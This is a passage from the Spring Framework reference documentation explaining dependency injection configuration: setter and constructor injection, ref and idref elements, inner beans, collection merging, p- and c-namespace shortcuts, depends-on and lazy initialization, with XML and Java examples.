Management through <<jmx,JMX MBeans>> is therefore a compelling use case for setter\ninjection.\n\nUse the DI style that makes the most sense for a particular class. Sometimes, when dealing\nwith third-party classes for which you do not have the source, the choice is made for you.\nFor example, if a third-party class does not expose any setter methods, then constructor\ninjection may be the only available form of DI.\n****\n\n\n[[beans-dependency-resolution]]\n==== Dependency resolution process\n\nThe container performs bean dependency resolution as follows:\n\n* The `ApplicationContext` is created and initialized with configuration metadata that\n describes all the beans. Configuration metadata can be specified via XML, Java code, or\n annotations.\n* For each bean, its dependencies are expressed in the form of properties, constructor\n arguments, or arguments to the static-factory method if you are using that instead of\n a normal constructor. These dependencies are provided to the bean, __when the bean is\n actually created__.\n* Each property or constructor argument is an actual definition of the value to set, or\n a reference to another bean in the container.\n* Each property or constructor argument which is a value is converted from its specified\n format to the actual type of that property or constructor argument. By default Spring\n can convert a value supplied in string format to all built-in types, such as `int`,\n `long`, `String`, `boolean`, etc.\n\nThe Spring container validates the configuration of each bean as the container is created.\nHowever, the bean properties themselves are not set until the bean __is actually created__.\nBeans that are singleton-scoped and set to be pre-instantiated (the default) are created\nwhen the container is created. Scopes are defined in <<beans-factory-scopes>>. Otherwise,\nthe bean is created only when it is requested. Creation of a bean potentially causes a\ngraph of beans to be created, as the bean's dependencies and its dependencies'\ndependencies (and so on) are created and assigned. Note that resolution mismatches among\nthose dependencies may show up late, i.e. on first creation of the affected bean.\n\n.Circular dependencies\n****\nIf you use predominantly constructor injection, it is possible to create an unresolvable\ncircular dependency scenario.\n\nFor example: Class A requires an instance of class B through constructor injection, and\nclass B requires an instance of class A through constructor injection. If you configure\nbeans for classes A and B to be injected into each other, the Spring IoC container\ndetects this circular reference at runtime, and throws a\n`BeanCurrentlyInCreationException`.\n\nOne possible solution is to edit the source code of some classes to be configured by\nsetters rather than constructors. Alternatively, avoid constructor injection and use\nsetter injection only. In other words, although it is not recommended, you can configure\ncircular dependencies with setter injection.\n\nUnlike the __typical__ case (with no circular dependencies), a circular dependency\nbetween bean A and bean B forces one of the beans to be injected into the other prior to\nbeing fully initialized itself (a classic chicken\/egg scenario).\n****\n\nYou can generally trust Spring to do the right thing. It detects configuration problems,\nsuch as references to non-existent beans and circular dependencies, at container\nload-time. Spring sets properties and resolves dependencies as late as possible, when\nthe bean is actually created. 
This means that a Spring container which has loaded\ncorrectly can later generate an exception when you request an object if there is a\nproblem creating that object or one of its dependencies. For example, the bean throws an\nexception as a result of a missing or invalid property. This potentially delayed\nvisibility of some configuration issues is why `ApplicationContext` implementations by\ndefault pre-instantiate singleton beans. At the cost of some upfront time and memory to\ncreate these beans before they are actually needed, you discover configuration issues\nwhen the `ApplicationContext` is created, not later. You can still override this default\nbehavior so that singleton beans will lazy-initialize, rather than be pre-instantiated.\n\nIf no circular dependencies exist, when one or more collaborating beans are being\ninjected into a dependent bean, each collaborating bean is __totally__ configured prior\nto being injected into the dependent bean. This means that if bean A has a dependency on\nbean B, the Spring IoC container completely configures bean B prior to invoking the\nsetter method on bean A. In other words, the bean is instantiated (if not a\npre-instantiated singleton), its dependencies are set, and the relevant lifecycle\nmethods (such as a <<beans-factory-lifecycle-initializingbean,configured init method>>\nor the <<beans-factory-lifecycle-initializingbean,InitializingBean callback method>>)\nare invoked.\n\n\n[[beans-some-examples]]\n==== Examples of dependency injection\n\nThe following example uses XML-based configuration metadata for setter-based DI. A small\npart of a Spring XML configuration file specifies some bean definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- setter injection using the nested ref element -->\n\t\t<property name=\"beanOne\">\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/property>\n\n\t\t<!-- setter injection using the neater ref attribute -->\n\t\t<property name=\"beanTwo\" ref=\"yetAnotherBean\"\/>\n\t\t<property name=\"integerProperty\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic void setBeanOne(AnotherBean beanOne) {\n\t\t\tthis.beanOne = beanOne;\n\t\t}\n\n\t\tpublic void setBeanTwo(YetAnotherBean beanTwo) {\n\t\t\tthis.beanTwo = beanTwo;\n\t\t}\n\n\t\tpublic void setIntegerProperty(int i) {\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nIn the preceding example, setters are declared to match against the properties specified\nin the XML file. 
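Such metadata is typically consumed by creating an `ApplicationContext` over it. The
following is a minimal, hypothetical bootstrap sketch (the file name `services.xml` is
invented, and `ExampleBean` is assumed to be the class shown above):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.context.ApplicationContext;
	import org.springframework.context.support.ClassPathXmlApplicationContext;

	public class Bootstrap {

		public static void main(String[] args) {
			// reads the bean definitions from the classpath and pre-instantiates
			// the singletons, calling setBeanOne(..), setBeanTwo(..) and
			// setIntegerProperty(..) on exampleBean along the way
			ApplicationContext context =
					new ClassPathXmlApplicationContext("services.xml");

			// retrieval shown for illustration only; as noted earlier,
			// application code should normally not call getBean()
			ExampleBean bean = context.getBean("exampleBean", ExampleBean.class);
		}
	}
----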
The following example uses constructor-based DI:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- constructor injection using the nested ref element -->\n\t\t<constructor-arg>\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/constructor-arg>\n\n\t\t<!-- constructor injection using the neater ref attribute -->\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\n\t\t<constructor-arg type=\"int\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic ExampleBean(\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\t\t\tthis.beanOne = anotherBean;\n\t\t\tthis.beanTwo = yetAnotherBean;\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nThe constructor arguments specified in the bean definition will be used as arguments to\nthe constructor of the `ExampleBean`.\n\nNow consider a variant of this example, where instead of using a constructor, Spring is\ntold to call a `static` factory method to return an instance of the object:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\" factory-method=\"createInstance\">\n\t\t<constructor-arg ref=\"anotherExampleBean\"\/>\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\t\t<constructor-arg value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\t\/\/ a private constructor\n\t\tprivate ExampleBean(...) {\n\t\t\t...\n\t\t}\n\n\t\t\/\/ a static factory method; the arguments to this method can be\n\t\t\/\/ considered the dependencies of the bean that is returned,\n\t\t\/\/ regardless of how those arguments are actually used.\n\t\tpublic static ExampleBean createInstance (\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\n\t\t\tExampleBean eb = new ExampleBean (...);\n\t\t\t\/\/ some other operations...\n\t\t\treturn eb;\n\t\t}\n\n\t}\n----\n\nArguments to the `static` factory method are supplied via `<constructor-arg\/>` elements,\nexactly the same as if a constructor had actually been used. The type of the class being\nreturned by the factory method does not have to be of the same type as the class that\ncontains the `static` factory method, although in this example it is. An instance\n(non-static) factory method would be used in an essentially identical fashion (aside\nfrom the use of the `factory-bean` attribute instead of the `class` attribute), so\ndetails will not be discussed here.\n\n\n\n[[beans-factory-properties-detailed]]\n=== Dependencies and configuration in detail\n\nAs mentioned in the previous section, you can define bean properties and constructor\narguments as references to other managed beans (collaborators), or as values defined\ninline. 
Spring's XML-based configuration metadata supports sub-element types within its\n`<property\/>` and `<constructor-arg\/>` elements for this purpose.\n\n\n[[beans-value-element]]\n==== Straight values (primitives, Strings, and so on)\n\nThe `value` attribute of the `<property\/>` element specifies a property or constructor\nargument as a human-readable string representation. Spring's\n<<core-convert-ConversionService-API, conversion service>> is used to convert these\nvalues from a `String` to the actual type of the property or argument.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\" destroy-method=\"close\">\n\t\t<!-- results in a setDriverClassName(String) call -->\n\t\t<property name=\"driverClassName\" value=\"com.mysql.jdbc.Driver\"\/>\n\t\t<property name=\"url\" value=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\/>\n\t\t<property name=\"username\" value=\"root\"\/>\n\t\t<property name=\"password\" value=\"masterkaoli\"\/>\n\t<\/bean>\n----\n\nThe following example uses the <<beans-p-namespace,p-namespace>> for even more succinct\nXML configuration.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\"\n\t\t\tdestroy-method=\"close\"\n\t\t\tp:driverClassName=\"com.mysql.jdbc.Driver\"\n\t\t\tp:url=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\n\t\t\tp:username=\"root\"\n\t\t\tp:password=\"masterkaoli\"\/>\n\n\t<\/beans>\n----\n\nThe preceding XML is more succinct; however, typos are discovered at runtime rather than\ndesign time, unless you use an IDE such as http:\/\/www.jetbrains.com\/idea\/[IntelliJ\nIDEA] or the https:\/\/spring.io\/tools\/sts[Spring Tool Suite] (STS)\nthat support automatic property completion when you create bean definitions. Such IDE\nassistance is highly recommended.\n\nYou can also configure a `java.util.Properties` instance as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"mappings\"\n\t\tclass=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\n\t\t<!-- typed as a java.util.Properties -->\n\t\t<property name=\"properties\">\n\t\t\t<value>\n\t\t\t\tjdbc.driver.className=com.mysql.jdbc.Driver\n\t\t\t\tjdbc.url=jdbc:mysql:\/\/localhost:3306\/mydb\n\t\t\t<\/value>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe Spring container converts the text inside the `<value\/>` element into a\n`java.util.Properties` instance by using the JavaBeans `PropertyEditor` mechanism. 
This
is a nice shortcut, and is one of a few places where the Spring team do favor the use of
the nested `<value/>` element over the `value` attribute style.

[[beans-idref-element]]
===== The idref element

The `idref` element is simply an error-proof way to pass the __id__ (string value - not
a reference) of another bean in the container to a `<constructor-arg/>` or `<property/>`
element.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="theTargetBean" class="..."/>

	<bean id="theClientBean" class="...">
		<property name="targetName">
			<idref bean="theTargetBean" />
		</property>
	</bean>
----

The above bean definition snippet is __exactly__ equivalent (at runtime) to the
following snippet:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="theTargetBean" class="..." />

	<bean id="client" class="...">
		<property name="targetName" value="theTargetBean" />
	</bean>
----

The first form is preferable to the second, because using the `idref` tag allows the
container to validate __at deployment time__ that the referenced, named bean actually
exists. In the second variation, no validation is performed on the value that is passed
to the `targetName` property of the `client` bean. Typos are only discovered (with most
likely fatal results) when the `client` bean is actually instantiated. If the `client`
bean is a <<beans-factory-scopes,prototype>> bean, this typo and the resulting exception
may only be discovered long after the container is deployed.

[NOTE]
====
The `local` attribute on the `idref` element is no longer supported in the 4.0 beans xsd
since it does not provide value over a regular `bean` reference anymore. Simply change
your existing `idref local` references to `idref bean` when upgrading to the 4.0 schema.
====

A common place (at least in versions earlier than Spring 2.0) where the `<idref/>` element
brings value is in the configuration of <<aop-pfb-1,AOP interceptors>> in a
`ProxyFactoryBean` bean definition. Using `<idref/>` elements when you specify the
interceptor names prevents you from misspelling an interceptor id.


[[beans-ref-element]]
==== References to other beans (collaborators)

The `ref` element is the final element inside a `<constructor-arg/>` or `<property/>`
definition element. Here you set the value of the specified property of a bean to be a
reference to another bean (a collaborator) managed by the container. The referenced bean
is a dependency of the bean whose property will be set, and it is initialized on demand
as needed before the property is set. (If the collaborator is a singleton bean, it may
be initialized already by the container.) All references are ultimately a reference to
another object. Scoping and validation depend on whether you specify the id/name of the
other object through the `bean`, `local`, or `parent` attributes.

Specifying the target bean through the `bean` attribute of the `<ref/>` tag is the most
general form, and allows creation of a reference to any bean in the same container or
parent container, regardless of whether it is in the same XML file.
The value of the\n`bean` attribute may be the same as the `id` attribute of the target bean, or as one of\nthe values in the `name` attribute of the target bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<ref bean=\"someBean\"\/>\n----\n\nSpecifying the target bean through the `parent` attribute creates a reference to a bean\nthat is in a parent container of the current container. The value of the `parent`\nattribute may be the same as either the `id` attribute of the target bean, or one of the\nvalues in the `name` attribute of the target bean, and the target bean must be in a\nparent container of the current one. You use this bean reference variant mainly when you\nhave a hierarchy of containers and you want to wrap an existing bean in a parent\ncontainer with a proxy that will have the same name as the parent bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the parent context -->\n\t<bean id=\"accountService\" class=\"com.foo.SimpleAccountService\">\n\t\t<!-- insert dependencies as required as here -->\n\t<\/bean>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the child (descendant) context -->\n\t<bean id=\"accountService\" <!-- bean name is the same as the parent bean -->\n\t\tclass=\"org.springframework.aop.framework.ProxyFactoryBean\">\n\t\t<property name=\"target\">\n\t\t\t<ref parent=\"accountService\"\/> <!-- notice how we refer to the parent bean -->\n\t\t<\/property>\n\t\t<!-- insert other configuration and dependencies as required here -->\n\t<\/bean>\n----\n\n[NOTE]\n====\nThe `local` attribute on the `ref` element is no longer supported in the 4.0 beans xsd\nsince it does not provide value over a regular `bean` reference anymore. Simply change\nyour existing `ref local` references to `ref bean` when upgrading to the 4.0 schema.\n====\n\n\n[[beans-inner-beans]]\n==== Inner beans\n\nA `<bean\/>` element inside the `<property\/>` or `<constructor-arg\/>` elements defines a\nso-called __inner bean__.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"outer\" class=\"...\">\n\t\t<!-- instead of using a reference to a target bean, simply define the target bean inline -->\n\t\t<property name=\"target\">\n\t\t\t<bean class=\"com.example.Person\"> <!-- this is the inner bean -->\n\t\t\t\t<property name=\"name\" value=\"Fiona Apple\"\/>\n\t\t\t\t<property name=\"age\" value=\"25\"\/>\n\t\t\t<\/bean>\n\t\t<\/property>\n\t<\/bean>\n----\n\nAn inner bean definition does not require a defined id or name; if specified, the container\ndoes not use such a value as an identifier. The container also ignores the `scope` flag on\ncreation: Inner beans are __always__ anonymous and they are __always__ created with the outer\nbean. It is __not__ possible to inject inner beans into collaborating beans other than into\nthe enclosing bean or to access them independently.\n\nAs a corner case, it is possible to receive destruction callbacks from a custom scope, e.g.\nfor a request-scoped inner bean contained within a singleton bean: The creation of the inner\nbean instance will be tied to its containing bean, but destruction callbacks allow it to\nparticipate in the request scope's lifecycle. 
This is not a common scenario; inner beans
typically simply share their containing bean's scope.


[[beans-collection-elements]]
==== Collections

In the `<list/>`, `<set/>`, `<map/>`, and `<props/>` elements, you set the properties
and arguments of the Java `Collection` types `List`, `Set`, `Map`, and `Properties`,
respectively.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="moreComplexObject" class="example.ComplexObject">
		<!-- results in a setAdminEmails(java.util.Properties) call -->
		<property name="adminEmails">
			<props>
				<prop key="administrator">administrator@example.org</prop>
				<prop key="support">support@example.org</prop>
				<prop key="development">development@example.org</prop>
			</props>
		</property>
		<!-- results in a setSomeList(java.util.List) call -->
		<property name="someList">
			<list>
				<value>a list element followed by a reference</value>
				<ref bean="myDataSource" />
			</list>
		</property>
		<!-- results in a setSomeMap(java.util.Map) call -->
		<property name="someMap">
			<map>
				<entry key="an entry" value="just some string"/>
				<entry key="a ref" value-ref="myDataSource"/>
			</map>
		</property>
		<!-- results in a setSomeSet(java.util.Set) call -->
		<property name="someSet">
			<set>
				<value>just some string</value>
				<ref bean="myDataSource" />
			</set>
		</property>
	</bean>
----

__The value of a map key or value, or a set value, can also be any of the
following elements:__

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	bean | ref | idref | list | set | map | props | value | null
----

[[beans-collection-elements-merging]]
===== Collection merging

The Spring container also supports the __merging__ of collections. An application
developer can define a parent-style `<list/>`, `<map/>`, `<set/>` or `<props/>` element,
and have child-style `<list/>`, `<map/>`, `<set/>` or `<props/>` elements inherit and
override values from the parent collection. That is, the child collection's values are
the result of merging the elements of the parent and child collections, with the child's
collection elements overriding values specified in the parent collection.

__This section on merging discusses the parent-child bean mechanism.
Readers unfamiliar
with parent and child bean definitions may wish to read the
<<beans-child-bean-definitions,relevant section>> before continuing.__

The following example demonstrates collection merging:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="parent" abstract="true" class="example.ComplexObject">
			<property name="adminEmails">
				<props>
					<prop key="administrator">administrator@example.com</prop>
					<prop key="support">support@example.com</prop>
				</props>
			</property>
		</bean>
		<bean id="child" parent="parent">
			<property name="adminEmails">
				<!-- the merge is specified on the child collection definition -->
				<props merge="true">
					<prop key="sales">sales@example.com</prop>
					<prop key="support">support@example.co.uk</prop>
				</props>
			</property>
		</bean>
	</beans>
----

Notice the use of the `merge="true"` attribute on the `<props/>` element of the
`adminEmails` property of the `child` bean definition. When the `child` bean is resolved
and instantiated by the container, the resulting instance has an `adminEmails`
`Properties` collection that contains the result of the merging of the child's
`adminEmails` collection with the parent's `adminEmails` collection.

[literal]
[subs="verbatim,quotes"]
----
administrator=administrator@example.com
sales=sales@example.com
support=support@example.co.uk
----

The child `Properties` collection's value set inherits all property elements from the
parent `<props/>`, and the child's value for the `support` key overrides the value in
the parent collection.

This merging behavior applies similarly to the `<list/>`, `<map/>`, and `<set/>`
collection types. In the specific case of the `<list/>` element, the semantics
associated with the `List` collection type, that is, the notion of an ordered
collection of values, is maintained; the parent's values precede all of the child list's
values. In the case of the `Map`, `Set`, and `Properties` collection types, no ordering
exists. Hence no ordering semantics are in effect for the collection types that underlie
the associated `Map`, `Set`, and `Properties` implementation types that the container
uses internally.

[[beans-collection-merge-limitations]]
===== Limitations of collection merging

You cannot merge different collection types (such as a `Map` and a `List`), and if you
do attempt to do so, an appropriate `Exception` is thrown. The `merge` attribute must be
specified on the lower, inherited, child definition; specifying the `merge` attribute on
a parent collection definition is redundant and will not result in the desired merging.

[[beans-collection-elements-strongly-typed]]
===== Strongly-typed collection

With the introduction of generic types in Java 5, you can use strongly typed collections.
That is, it is possible to declare a `Collection` type such that it can only contain
`String` elements (for example).
If you are using Spring to dependency-inject a
strongly-typed `Collection` into a bean, you can take advantage of Spring's
type-conversion support such that the elements of your strongly-typed `Collection`
instances are converted to the appropriate type prior to being added to the `Collection`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class Foo {

		private Map<String, Float> accounts;

		public void setAccounts(Map<String, Float> accounts) {
			this.accounts = accounts;
		}
	}
----

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="foo" class="x.y.Foo">
			<property name="accounts">
				<map>
					<entry key="one" value="9.99"/>
					<entry key="two" value="2.75"/>
					<entry key="six" value="3.99"/>
				</map>
			</property>
		</bean>
	</beans>
----

When the `accounts` property of the `foo` bean is prepared for injection, the generics
information about the element type of the strongly-typed `Map<String, Float>` is
available by reflection. Thus Spring's type conversion infrastructure recognizes the
various value elements as being of type `Float`, and the string values `9.99`, `2.75`,
and `3.99` are converted into an actual `Float` type.


[[beans-null-element]]
==== Null and empty string values

Spring treats empty arguments for properties and the like as empty `Strings`. The
following XML-based configuration metadata snippet sets the email property to the empty
`String` value ("").

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean class="ExampleBean">
		<property name="email" value=""/>
	</bean>
----

The preceding example is equivalent to the following Java code:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	exampleBean.setEmail("");
----

The `<null/>` element handles `null` values. For example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean class="ExampleBean">
		<property name="email">
			<null/>
		</property>
	</bean>
----

The above configuration is equivalent to the following Java code:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	exampleBean.setEmail(null);
----


[[beans-p-namespace]]
==== XML shortcut with the p-namespace

The p-namespace enables you to use the `bean` element's attributes, instead of nested
`<property/>` elements, to describe your property values and/or collaborating beans.

Spring supports extensible configuration formats <<xsd-configuration,with namespaces>>, which are
based on an XML Schema definition. The `beans` configuration format discussed in this
chapter is defined in an XML Schema document.
However, the p-namespace is not defined in
an XSD file and exists only in the core of Spring.

The following example shows two XML snippets that resolve to the same result: The first
uses standard XML format and the second uses the p-namespace.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:p="http://www.springframework.org/schema/p"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean name="classic" class="com.example.ExampleBean">
			<property name="email" value="foo@bar.com"/>
		</bean>

		<bean name="p-namespace" class="com.example.ExampleBean"
			p:email="foo@bar.com"/>
	</beans>
----

The example shows an attribute in the p-namespace called `email` in the bean definition.
This tells Spring to include a property declaration. As previously mentioned, the
p-namespace does not have a schema definition, so you can set the name of the attribute
to the property name.

This next example includes two more bean definitions that both have a reference to
another bean:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:p="http://www.springframework.org/schema/p"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean name="john-classic" class="com.example.Person">
			<property name="name" value="John Doe"/>
			<property name="spouse" ref="jane"/>
		</bean>

		<bean name="john-modern"
			class="com.example.Person"
			p:name="John Doe"
			p:spouse-ref="jane"/>

		<bean name="jane" class="com.example.Person">
			<property name="name" value="Jane Doe"/>
		</bean>
	</beans>
----

As you can see, this example not only includes a property value using the p-namespace,
but also uses a special format to declare property references. Whereas the first bean
definition uses `<property name="spouse" ref="jane"/>` to create a reference from bean
`john-classic` to bean `jane`, the second bean definition uses `p:spouse-ref="jane"` as an
attribute to do the exact same thing. In this case `spouse` is the property name,
whereas the `-ref` part indicates that this is not a straight value but rather a
reference to another bean.

[NOTE]
====
The p-namespace is not as flexible as the standard XML format. For example, the format
for declaring property references clashes with properties that end in `Ref`, whereas the
standard XML format does not.
We recommend that you choose your approach carefully and
communicate this to your team members, to avoid producing XML documents that use all
three approaches at the same time.
====


[[beans-c-namespace]]
==== XML shortcut with the c-namespace

Similar to the <<beans-p-namespace>>, the __c-namespace__, newly introduced in Spring
3.1, allows usage of inlined attributes for configuring the constructor arguments rather
than nested `constructor-arg` elements.

Let's review the examples from <<beans-constructor-injection>> with the `c:` namespace:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:c="http://www.springframework.org/schema/c"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd">

		<bean id="bar" class="x.y.Bar"/>
		<bean id="baz" class="x.y.Baz"/>

		<!-- traditional declaration -->
		<bean id="foo" class="x.y.Foo">
			<constructor-arg ref="bar"/>
			<constructor-arg ref="baz"/>
			<constructor-arg value="foo@bar.com"/>
		</bean>

		<!-- c-namespace declaration -->
		<bean id="foo" class="x.y.Foo" c:bar-ref="bar" c:baz-ref="baz" c:email="foo@bar.com"/>

	</beans>
----

The `c:` namespace uses the same conventions as the `p:` one (trailing `-ref` for bean
references) for setting the constructor arguments by their names. Like the p-namespace,
it needs to be declared even though it is not defined in an XSD schema (but it exists
inside the Spring core).

For the rare cases where the constructor argument names are not available (usually if
the bytecode was compiled without debugging information), one can fall back on the
argument indexes:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- c-namespace index declaration -->
	<bean id="foo" class="x.y.Foo" c:_0-ref="bar" c:_1-ref="baz"/>
----

[NOTE]
====
Due to the XML grammar, the index notation requires the presence of the leading `_` as
XML attribute names cannot start with a number (even though some IDEs allow it).
====

In practice, the constructor resolution
<<beans-factory-ctor-arguments-resolution,mechanism>> is quite efficient in matching
arguments, so unless you really need to, we recommend using the name notation
throughout your configuration.


[[beans-compound-property-names]]
==== Compound property names

You can use compound or nested property names when you set bean properties, as long as
all components of the path except the final property name are not `null`. Consider the
following bean definition:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="foo" class="foo.Bar">
		<property name="fred.bob.sammy" value="123" />
	</bean>
----

The `foo` bean has a `fred` property, which has a `bob` property, which has a `sammy`
property, and that final `sammy` property is being set to the value `123`. In order for
this to work, the `fred` property of `foo` and the `bob` property of `fred` must not be
`null` after the bean is constructed, or a `NullPointerException` is thrown.



[[beans-factory-dependson]]
=== Using depends-on

If a bean is a dependency of another, that usually means that one bean is set as a
property of another.
Typically you accomplish this with the <<beans-ref-element, `<ref\/>`\nelement>> in XML-based configuration metadata. However, sometimes dependencies between\nbeans are less direct; for example, a static initializer in a class needs to be\ntriggered, such as database driver registration. The `depends-on` attribute can\nexplicitly force one or more beans to be initialized before the bean using this element\nis initialized. The following example uses the `depends-on` attribute to express a\ndependency on a single bean:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager\"\/>\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n----\n\nTo express a dependency on multiple beans, supply a list of bean names as the value of\nthe `depends-on` attribute, with commas, whitespace and semicolons, used as valid\ndelimiters:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager,accountDao\">\n\t\t<property name=\"manager\" ref=\"manager\" \/>\n\t<\/bean>\n\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n\t<bean id=\"accountDao\" class=\"x.y.jdbc.JdbcAccountDao\" \/>\n----\n\n[NOTE]\n====\nThe `depends-on` attribute in the bean definition can specify both an initialization\ntime dependency and, in the case of <<beans-factory-scopes-singleton,singleton>> beans\nonly, a corresponding destroy time dependency. Dependent beans that define a\n`depends-on` relationship with a given bean are destroyed first, prior to the given bean\nitself being destroyed. Thus `depends-on` can also control shutdown order.\n====\n\n\n\n[[beans-factory-lazy-init]]\n=== Lazy-initialized beans\n\nBy default, `ApplicationContext` implementations eagerly create and configure all\n<<beans-factory-scopes-singleton,singleton>> beans as part of the initialization\nprocess. Generally, this pre-instantiation is desirable, because errors in the\nconfiguration or surrounding environment are discovered immediately, as opposed to hours\nor even days later. When this behavior is __not__ desirable, you can prevent\npre-instantiation of a singleton bean by marking the bean definition as\nlazy-initialized. A lazy-initialized bean tells the IoC container to create a bean\ninstance when it is first requested, rather than at startup.\n\nIn XML, this behavior is controlled by the `lazy-init` attribute on the `<bean\/>`\nelement; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lazy\" class=\"com.foo.ExpensiveToCreateBean\" lazy-init=\"true\"\/>\n\t<bean name=\"not.lazy\" class=\"com.foo.AnotherBean\"\/>\n----\n\nWhen the preceding configuration is consumed by an `ApplicationContext`, the bean named\n`lazy` is not eagerly pre-instantiated when the `ApplicationContext` is starting up,\nwhereas the `not.lazy` bean is eagerly pre-instantiated.\n\nHowever, when a lazy-initialized bean is a dependency of a singleton bean that is\n__not__ lazy-initialized, the `ApplicationContext` creates the lazy-initialized bean at\nstartup, because it must satisfy the singleton's dependencies. The lazy-initialized bean\nis injected into a singleton bean elsewhere that is not lazy-initialized.\n\nYou can also control lazy-initialization at the container level by using the\n`default-lazy-init` attribute on the `<beans\/>` element; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-lazy-init=\"true\">\n\t\t<!-- no beans will be pre-instantiated... 
